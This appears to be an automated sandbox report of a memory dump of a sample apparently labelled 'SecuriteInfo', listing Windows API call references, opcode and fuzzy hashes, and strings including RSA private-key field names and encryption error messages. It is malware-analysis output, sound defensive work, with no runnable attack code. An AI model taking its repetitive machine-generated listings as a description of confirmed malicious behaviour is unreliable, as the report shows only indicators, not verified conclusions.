                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                          • API String ID: 834187326-2211150622
                                                                                          • Opcode ID: f9b7ca5a585834d48e6d975f6ae25f77eeb0c8bad042c2fe88acb450bb0fea8c
                                                                                          • Instruction ID: 148ae46b637b8156c78601f85e944ae0287f70b7b7036cb6e01d57a1c57871e5
                                                                                          • Opcode Fuzzy Hash: f9b7ca5a585834d48e6d975f6ae25f77eeb0c8bad042c2fe88acb450bb0fea8c
                                                                                          • Instruction Fuzzy Hash: 62219DB4704509AFEF11CF68C450BA97BF4EB4A38AB098299E945CF217CB30D943DB58
                                                                                          APIs
                                                                                          • UnDecorator::UScore.LIBCMT ref: 6D075D40
                                                                                          • DName::DName.LIBCMT ref: 6D075D4C
                                                                                            • Part of subcall function 6D073B3B: DName::doPchar.LIBCMT ref: 6D073B6C
                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 6D075D8B
                                                                                          • DName::operator+=.LIBCMT ref: 6D075D95
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DA4
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DB0
                                                                                          • DName::operator+=.LIBCMT ref: 6D075DBD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                          • String ID: void
                                                                                          • API String ID: 1480779885-3531332078
                                                                                          • Opcode ID: b76097ac76d0275a0312e49abcdd4eefad12d798018f6453c574aafa5c3d06fb
                                                                                          • Instruction ID: 26b26d4f76927fe819851e1037ab47edf6ad5c14a37134a39634eba000ef2f97
                                                                                          • Opcode Fuzzy Hash: b76097ac76d0275a0312e49abcdd4eefad12d798018f6453c574aafa5c3d06fb
                                                                                          • Instruction Fuzzy Hash: 9111C2B4904244AFFB25DF68C89DBFC7BB0AB05305F064098D1259F2E1DB70AE46CB48
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D0284BF
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D0284D2
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D02850A
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D01DFF6
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01E003
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01E02F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                          • String ID:
                                                                                          • API String ID: 959723449-0
                                                                                          • Opcode ID: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction ID: b0296e9f0e773d9e1f416914c0fbdd764fdbb078f71c0c3e952c9d11891c0569
                                                                                          • Opcode Fuzzy Hash: 8dae9c4ee980f497cd8a99c96576af7759d625befbd62088d40d513acb239f08
                                                                                          • Instruction Fuzzy Hash: B0C18674A052059FEF10DF68CC80FADB7B9AF85308F608199E619EB286DB71ED41CB50
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02CB1C
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02CB39
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CB49
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02CB4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: 1a349170bfb8760916a0a173e7fd98828ecd4b80e61e9d0427434b8a4318db0a
                                                                                          • Instruction ID: b580adaa68d2009b7a6d4f2deb08d997b12fe146ad99dd3805847cde250568da
                                                                                          • Opcode Fuzzy Hash: 1a349170bfb8760916a0a173e7fd98828ecd4b80e61e9d0427434b8a4318db0a
                                                                                          • Instruction Fuzzy Hash: 93B13875600649AFDB14DF98CC84EBAB7F9BF8D300F158568E606AB791DA34F841CB60
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023F7B
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023F8D
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D023FB7
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D023FD0
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0240C9
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024105
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D024123
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024157
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D024168
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                                                          • String ID:
                                                                                          • API String ID: 758290628-0
                                                                                          • Opcode ID: 0cc43784147e7ca1cfd2a225f56c5176f3c2f581f5165addd22c4a137712ea52
                                                                                          • Instruction ID: b0b585e6a2ec01feb6c0735423db9e11e1be9c63af03c6214a4d2a73ea2b1e7b
                                                                                          • Opcode Fuzzy Hash: 0cc43784147e7ca1cfd2a225f56c5176f3c2f581f5165addd22c4a137712ea52
                                                                                          • Instruction Fuzzy Hash: 3D718C76109342AFD700DF68C8C4A6BBBF9BBAD704F104A2CF69587250D730E945CB92
                                                                                          APIs
                                                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,4E8A916F), ref: 6D00FC98
                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,4E8A916F), ref: 6D00FCAD
                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,4E8A916F), ref: 6D00FCB7
                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,4E8A916F), ref: 6D00FCBA
                                                                                          • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD01
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,4E8A916F), ref: 6D00FD14
                                                                                          • GetLastError.KERNEL32(?,?,00000000,4E8A916F), ref: 6D00FD2A
                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD6B
                                                                                          • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,4E8A916F), ref: 6D00FD98
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                                                          • String ID:
                                                                                          • API String ID: 1303881157-0
                                                                                          • Opcode ID: 72f9d2d6979760d9147d07faea9e9b2a3030c298823d5673ebd38e9766c90ab3
                                                                                          • Instruction ID: 9f66abb79388035f2dd333414d3845cdd5f181b464e8ca33ca18df4f2587ab74
                                                                                          • Opcode Fuzzy Hash: 72f9d2d6979760d9147d07faea9e9b2a3030c298823d5673ebd38e9766c90ab3
                                                                                          • Instruction Fuzzy Hash: B051F7B1A04302BBFB008F34C885B6A7BE9AB4D360F158669ED15CF2C5DB74D8019BE5
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0642DD
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D064363
                                                                                          • _memmove.LIBCMT ref: 6D064381
                                                                                          • _memmove.LIBCMT ref: 6D0643E6
                                                                                          • _memmove.LIBCMT ref: 6D064453
                                                                                          • _memmove.LIBCMT ref: 6D064474
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 4034224661-3788999226
                                                                                          • Opcode ID: 6c58f694b7bd637bebf2daf8db2b6bb2cabed54eef197afe35d2b839ff7b28f7
                                                                                          • Instruction ID: 46a439b637af146920cb9365e6e2936cae660dc3cc8b78f4e10884e574d3ec4d
                                                                                          • Opcode Fuzzy Hash: 6c58f694b7bd637bebf2daf8db2b6bb2cabed54eef197afe35d2b839ff7b28f7
                                                                                          • Instruction Fuzzy Hash: 5E51A3B17083069FD718CF68DC85A6BB7E9EBD8218F194A2DF946C3344E671E904C7A1
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 2168136238-4289949731
                                                                                          • Opcode ID: d95a4007f9308818ddaac26158d15891fdcb0bc1045900fc9ce55aa064a7e002
                                                                                          • Instruction ID: 3fdb9b7c8b64e7530c59406b3289fc5efb78d548b5870596db40941b51f9ebf0
                                                                                          • Opcode Fuzzy Hash: d95a4007f9308818ddaac26158d15891fdcb0bc1045900fc9ce55aa064a7e002
                                                                                          • Instruction Fuzzy Hash: 0241D932314262ABF724CE1CE880F6EF7E9EB9D714B62091EE151CB691C762DC858761
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSDi
                                                                                          • API String ID: 4225690600-559181253
                                                                                          • Opcode ID: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction ID: dc3e85e5980422e022235240abe6a177f6c90cf759abcf30b3b052dff5ed3ba0
                                                                                          • Opcode Fuzzy Hash: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction Fuzzy Hash: BF412974A016199FEB10DFA9C980F6EB7FAAF89300F60858AE509DB355DB31E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSUa
                                                                                          • API String ID: 4225690600-2086061799
                                                                                          • Opcode ID: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction ID: 513711f4efd1bf67bf66858d2ab9db96c704a97b9f2082a17efb753fa5397278
                                                                                          • Opcode Fuzzy Hash: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction Fuzzy Hash: 70313B70E016199FEB10CFA9CD80B6EB7F9AF89300F608586E558EB251C771DA81CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSa
                                                                                          • API String ID: 4225690600-3169278968
                                                                                          • Opcode ID: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction ID: cf66bc53f6f57467b729023e6f62b7a09116631cda2c57f4a56b8492d56d1b52
                                                                                          • Opcode Fuzzy Hash: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction Fuzzy Hash: 62313C70E116199FDB10DFA9CD80B6EB7F9AF89300F608596E518EB251C771DA41CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RSqb
                                                                                          • API String ID: 4225690600-347567867
                                                                                          • Opcode ID: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction ID: 935c17568d74df049544229a5196efa9e1c6c81a672705ff1588b4f26ff6d1e2
                                                                                          • Opcode Fuzzy Hash: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction Fuzzy Hash: 32315C70E016099FDB10CFA9CD80B6EB7F9AF89300F608586E518EB251DB75DA81CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS:h
                                                                                          • API String ID: 4225690600-3891202347
                                                                                          • Opcode ID: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction ID: 463a3f82bfcd7022eb0b9f6cbb898139b70206aa330628d405fe04918fe3abf1
                                                                                          • Opcode Fuzzy Hash: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction Fuzzy Hash: BD314B70E016099FEB10CFA9CC80B6EB7FAAF89200F208596E558EB255C771DA81CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS3g
                                                                                          • API String ID: 4225690600-2794631155
                                                                                          • Opcode ID: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction ID: cec9403ee5b197a6e8b6809e88075afc68a1a0013a2ffee4dde45e5c9c732043
                                                                                          • Opcode Fuzzy Hash: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction Fuzzy Hash: CE315C70E056099FDB10CFA9CD80B6EB7F9AF89200F608696E558EB251CB71DA41CF50
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D05C7EB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                                                                          • API String ID: 2241493438-339133643
                                                                                          • Opcode ID: f77391c9f5ccabf3dd1551f58dcc3e58ca447da3de187f2887f3bc026a08105e
                                                                                          • Instruction ID: 8493e9e274cf0d995675bc5264b761ab06783e9261ebf9e375f2a302a8d7d207
                                                                                          • Opcode Fuzzy Hash: f77391c9f5ccabf3dd1551f58dcc3e58ca447da3de187f2887f3bc026a08105e
                                                                                          • Instruction Fuzzy Hash: 4E31A1B0A183459ED7009F7CCA4575ABBF1AFC5204F014A6EF9489B361EB70D858CB83
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS%e
                                                                                          • API String ID: 4225690600-1409579784
                                                                                          • Opcode ID: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction ID: 115e782ce2a0ded9f889c317c7cc4d5a58907b9199219c00eaee8a5f204814db
                                                                                          • Opcode Fuzzy Hash: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction Fuzzy Hash: 39314B70E016189FEB10CFA9CC80BADB7FAAF89300F60859AE558EB251C771DA408F50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          • Opcode ID: 89f8b3f4b40b1a0e2c0d33886e8b185396aa9e574f5306c8a6d23b5db97d78a6
                                                                                          • Instruction ID: 0e5ddd27d3688bd6a59981e39819e6a1eeb5e5e089f4937a8b208e5fe1b1e07a
                                                                                          • Opcode Fuzzy Hash: 89f8b3f4b40b1a0e2c0d33886e8b185396aa9e574f5306c8a6d23b5db97d78a6
                                                                                          • Instruction Fuzzy Hash: 0BC15A716087419FD300DF98C880E6ABBE6FFC8304F248A5DF5958B265D731E84ACB92
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D019DEB
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D019DFB
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D019E29
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D019F25
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D019FE5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                          • String ID: @
                                                                                          • API String ID: 3214203402-2766056989
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01B3EB
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01B3FB
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01B429
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D01B525
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B5E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                          • String ID: @
                                                                                          • API String ID: 3214203402-2766056989
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0416B2
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D04180A
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          • exceeds the maximum of , xrefs: 6D04173F
                                                                                          • : message length of , xrefs: 6D04170D
                                                                                          • for this public key, xrefs: 6D041771
                                                                                          • : this key is too short to encrypt any messages, xrefs: 6D04162A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                                                                          • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                                                                          • API String ID: 3807434085-412673420
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0613BE
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D061431
                                                                                          • _memmove.LIBCMT ref: 6D061456
                                                                                          • _memmove.LIBCMT ref: 6D061493
                                                                                          • _memmove.LIBCMT ref: 6D0614B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: deque<T> too long
                                                                                          • API String ID: 4034224661-309773918
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D06126E
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D0612E0
                                                                                          • _memmove.LIBCMT ref: 6D061305
                                                                                          • _memmove.LIBCMT ref: 6D061342
                                                                                          • _memmove.LIBCMT ref: 6D06135F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: deque<T> too long
                                                                                          • API String ID: 4034224661-309773918
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DA9
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DCA
